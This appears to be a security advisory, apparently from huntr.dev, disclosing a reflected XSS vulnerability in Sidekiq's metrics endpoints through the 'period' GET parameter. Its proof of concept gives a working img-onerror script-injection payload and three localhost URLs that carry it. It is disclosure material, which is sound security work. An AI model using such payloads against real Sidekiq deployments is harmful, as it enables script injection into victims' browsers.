Lucene search

K
huntrSpercexE35E5653-C429-4FB8-94A3-CBC123AE4777
HistoryApr 02, 2023 - 9:39 p.m.

Reflected XSS on Sidekiq through multiples endpoints via GET parameter "period"

2023-04-0221:39:17
spercex
www.huntr.dev
9
reflected xss
sidekiq
get parameter

EPSS

0.027

Percentile

90.6%

Description

Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected off of a web application to the victim’s browser.

Proof of Concept

There must have been a metrics during the default value of the period parameter.
You simply have to set the payload in the period parameter.
Payload : "><img/src/onerror=alert(document.domain)>

Example of URL with payload :

  • https://localhost/sidekiq/metrics?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E
  • https://localhost/sidekiq/metrics/SanityChecksJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E
  • https://localhost/sidekiq/metrics/ActiveStorage::PurgeJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E

EPSS

0.027

Percentile

90.6%